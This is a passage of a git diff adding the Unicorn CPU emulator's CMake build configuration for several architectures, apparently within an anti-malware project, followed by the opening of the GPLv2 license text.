(UNICORN_HAS_ARM) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/armeb-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/armeb-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_AARCH64) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64eb-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64eb-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_M68K) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_MIPS) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_SPARC) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.h + ) + endif() + add_compile_options( + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/${UNICORN_TARGET_ARCH} + -D_GNU_SOURCE + -D_FILE_OFFSET_BITS=64 + -D_LARGEFILE_SOURCE + -Wall -O2 + -fPIC -fpic -fvisibility=hidden + ) +endif() + +if (UNICORN_HAS_X86) +add_library(x86_64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/i386/pc.c + qemu/hw/i386/pc_piix.c + qemu/hw/intc/apic.c + qemu/hw/intc/apic_common.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-i386/arch_memory_mapping.c + qemu/target-i386/cc_helper.c + qemu/target-i386/cpu.c + qemu/target-i386/excp_helper.c + qemu/target-i386/fpu_helper.c + qemu/target-i386/helper.c + qemu/target-i386/int_helper.c + qemu/target-i386/mem_helper.c + qemu/target-i386/misc_helper.c + qemu/target-i386/seg_helper.c + qemu/target-i386/smm_helper.c + qemu/target-i386/svm_helper.c + qemu/target-i386/translate.c + qemu/target-i386/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(x86_64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(x86_64-softmmu PRIVATE + -DNEED_CPU_H + /FIx86_64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/x86_64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-i386 + ) +else() + target_compile_options(x86_64-softmmu PRIVATE + -DNEED_CPU_H + -include x86_64.h + -I${CMAKE_BINARY_DIR}/x86_64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-i386 + ) +endif() +endif() + +if (UNICORN_HAS_ARM) +add_library(arm-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_arm.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(arm-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(arm-softmmu PRIVATE + -DNEED_CPU_H + /FIarm.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/arm-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(arm-softmmu PRIVATE + -DNEED_CPU_H + -include arm.h + -I${CMAKE_BINARY_DIR}/arm-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() + +add_library(armeb-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_arm.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(armeb-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(armeb-softmmu PRIVATE + -DNEED_CPU_H + /FIarmeb.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/armeb-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(armeb-softmmu PRIVATE + -DNEED_CPU_H + -include armeb.h + -I${CMAKE_BINARY_DIR}/armeb-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() +endif() + +if (UNICORN_HAS_AARCH64) +add_library(aarch64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/cpu64.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper-a64.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate-a64.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_aarch64.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(aarch64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(aarch64-softmmu PRIVATE + -DNEED_CPU_H + /FIaarch64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/aarch64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(aarch64-softmmu PRIVATE + -DNEED_CPU_H + -include aarch64.h + -I${CMAKE_BINARY_DIR}/aarch64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() + +add_library(aarch64eb-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/cpu64.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper-a64.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate-a64.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_aarch64.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(aarch64eb-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(aarch64eb-softmmu PRIVATE + -DNEED_CPU_H + /FIaarch64eb.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/aarch64eb-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(aarch64eb-softmmu PRIVATE + -DNEED_CPU_H + -include aarch64eb.h + -I${CMAKE_BINARY_DIR}/aarch64eb-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() +endif() + +if (UNICORN_HAS_M68K) +add_library(m68k-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/m68k/dummy_m68k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-m68k/cpu.c + qemu/target-m68k/helper.c + qemu/target-m68k/op_helper.c + qemu/target-m68k/translate.c + qemu/target-m68k/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(m68k-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(m68k-softmmu PRIVATE + -DNEED_CPU_H + /FIm68k.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/m68k-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-m68k + ) +else() + target_compile_options(m68k-softmmu PRIVATE + -DNEED_CPU_H + -include m68k.h + -I${CMAKE_BINARY_DIR}/m68k-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-m68k + ) +endif() +endif() + +if (UNICORN_HAS_MIPS) +add_library(mips-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips-softmmu PRIVATE + -DNEED_CPU_H + /FImips.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips-softmmu PRIVATE + -DNEED_CPU_H + -include mips.h + -I${CMAKE_BINARY_DIR}/mips-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mipsel-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mipsel-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mipsel-softmmu PRIVATE + -DNEED_CPU_H + /FImipsel.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mipsel-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mipsel-softmmu PRIVATE + -DNEED_CPU_H + -include mipsel.h + -I${CMAKE_BINARY_DIR}/mipsel-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mips64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips64-softmmu PRIVATE + -DNEED_CPU_H + /FImips64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips64-softmmu PRIVATE + -DNEED_CPU_H + -include mips64.h + -I${CMAKE_BINARY_DIR}/mips64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mips64el-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips64el-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips64el-softmmu PRIVATE + -DNEED_CPU_H + /FImips64el.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips64el-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips64el-softmmu PRIVATE + -DNEED_CPU_H + -include mips64el.h + -I${CMAKE_BINARY_DIR}/mips64el-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() +endif() + +if (UNICORN_HAS_SPARC) +add_library(sparc-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/sparc/leon3.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-sparc/cc_helper.c + qemu/target-sparc/cpu.c + qemu/target-sparc/fop_helper.c + qemu/target-sparc/helper.c + qemu/target-sparc/int32_helper.c + qemu/target-sparc/ldst_helper.c + qemu/target-sparc/mmu_helper.c + qemu/target-sparc/translate.c + qemu/target-sparc/unicorn.c + qemu/target-sparc/win_helper.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(sparc-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(sparc-softmmu PRIVATE + -DNEED_CPU_H + /FIsparc.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/sparc-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +else() + target_compile_options(sparc-softmmu PRIVATE + -DNEED_CPU_H + -include sparc.h + -I${CMAKE_BINARY_DIR}/sparc-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +endif() + +add_library(sparc64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/sparc64/sun4u.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-sparc/cc_helper.c + qemu/target-sparc/cpu.c + qemu/target-sparc/fop_helper.c + qemu/target-sparc/helper.c + qemu/target-sparc/int64_helper.c + qemu/target-sparc/ldst_helper.c + qemu/target-sparc/mmu_helper.c + qemu/target-sparc/translate.c + qemu/target-sparc/unicorn64.c + qemu/target-sparc/vis_helper.c + qemu/target-sparc/win_helper.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(sparc64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(sparc64-softmmu PRIVATE + -DNEED_CPU_H + /FIsparc64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/sparc64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +else() + target_compile_options(sparc64-softmmu PRIVATE + -DNEED_CPU_H + -include sparc64.h + -I${CMAKE_BINARY_DIR}/sparc64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +endif() +endif() + +set(UNICORN_SRCS_COMMON + list.c + qemu/accel.c + qemu/glib_compat.c + qemu/hw/core/machine.c + qemu/hw/core/qdev.c + qemu/qapi/qapi-dealloc-visitor.c + qemu/qapi/qapi-visit-core.c + qemu/qapi/qmp-input-visitor.c + qemu/qapi/qmp-output-visitor.c + qemu/qapi/string-input-visitor.c + qemu/qemu-log.c + qemu/qemu-timer.c + qemu/qobject/qbool.c + qemu/qobject/qdict.c + qemu/qobject/qerror.c + qemu/qobject/qfloat.c + qemu/qobject/qint.c + qemu/qobject/qlist.c + qemu/qobject/qstring.c + qemu/qom/container.c + qemu/qom/cpu.c + qemu/qom/object.c + qemu/qom/qom-qobject.c + qemu/tcg-runtime.c + qemu/util/aes.c + qemu/util/bitmap.c + qemu/util/bitops.c + qemu/util/crc32c.c + qemu/util/cutils.c + qemu/util/error.c + qemu/util/getauxval.c + qemu/util/host-utils.c + qemu/util/module.c + qemu/util/qemu-timer-common.c + qemu/vl.c + uc.c +) + +if (MSVC) + set(UNICORN_SRCS + ${UNICORN_SRCS_COMMON} + qemu/util/oslib-win32.c + qemu/util/qemu-thread-win32.c + qemu/util/qemu-error.c + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/qapi-types.c + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/qapi-visit.c + ) + if(CMAKE_SIZEOF_VOID_P EQUAL 8) + enable_language(ASM_MASM) + set(UNICORN_SRCS ${UNICORN_SRCS} qemu/util/setjmp-wrapper-win32.asm) + endif() +else() + set(UNICORN_SRCS + ${UNICORN_SRCS_COMMON} + qemu/util/oslib-posix.c + qemu/util/qemu-thread-posix.c + qemu/qapi-types.c + qemu/qapi-visit.c + ) +endif() + +if (UNICORN_BUILD_SHARED) + add_library(unicorn SHARED + ${UNICORN_SRCS} + ) +else() + add_library(unicorn STATIC + ${UNICORN_SRCS} + ) +endif() + +if (UNICORN_HAS_X86) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_X86) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} x86_64-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_x86 sample_x86_32_gdt_and_seg_regs sample_batch_reg mem_apis shellcode) +endif() +if (UNICORN_HAS_ARM) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM -DUNICORN_HAS_ARMEB) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} arm-softmmu armeb-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm sample_armeb) +endif() +if (UNICORN_HAS_AARCH64) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM64) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} aarch64-softmmu aarch64eb-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm64 sample_arm64eb) +endif() +if (UNICORN_HAS_M68K) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_M68K) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} m68k-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_m68k) +endif() +if (UNICORN_HAS_MIPS) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_mips) +endif() +if (UNICORN_HAS_SPARC) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_SPARC) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} sparc-softmmu sparc64-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_sparc) +endif() + +target_compile_options(unicorn PRIVATE + ${UNICORN_COMPILE_OPTIONS} +) + +if(MSVC) + if (UNICORN_BUILD_SHARED) + target_compile_options(unicorn PRIVATE + -DUNICORN_SHARED + ) + endif() + + target_link_libraries(unicorn + ${UNICORN_LINK_LIBRARIES} + ) +else() + target_link_libraries(unicorn + ${UNICORN_LINK_LIBRARIES} + m + ) + set_target_properties(unicorn PROPERTIES + VERSION ${UNICORN_VERSION_MAJOR} + SOVERSION ${UNICORN_VERSION_MAJOR} + ) +endif() + +if(MSVC) + set(SAMPLES_LIB + unicorn + ) +else() + set(SAMPLES_LIB + unicorn + pthread + ) +endif() + +foreach(SAMPLE_FILE ${UNICORN_SAMPLE_FILE}) + add_executable(${SAMPLE_FILE} + ${CMAKE_CURRENT_SOURCE_DIR}/samples/${SAMPLE_FILE}.c + ) + target_link_libraries(${SAMPLE_FILE} + ${SAMPLES_LIB} + ) +endforeach(SAMPLE_FILE) + +if(NOT MSVC) + include("GNUInstallDirs") + file(GLOB UNICORN_HEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/unicorn/*.h) + install(TARGETS unicorn + RUNTIME DESTINATION bin + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + ) + install(FILES ${UNICORN_HEADERS} DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}/unicorn) + file(WRITE ${CMAKE_BINARY_DIR}/unicorn.pc "Name: unicorn\n\ +Description: Unicorn emulator engine\n\ +Version: ${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}.${UNICORN_VERSION_PATCH}\n\ +libdir=${CMAKE_INSTALL_FULL_LIBDIR}\n\ +includedir=${CMAKE_INSTALL_FULL_INCLUDEDIR}\n\ +Libs: -L\$\{libdir\} -lunicorn\n\ +Cflags: -I\$\{includedir\}\n" + ) + install(FILES ${CMAKE_BINARY_DIR}/unicorn.pc DESTINATION ${CMAKE_INSTALL_LIBDIR}/pkgconfig) +endif() diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING b/ai_anti_malware/unicorn/unicorn-master/COPYING new file mode 100644 index 0000000..00ccfbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or 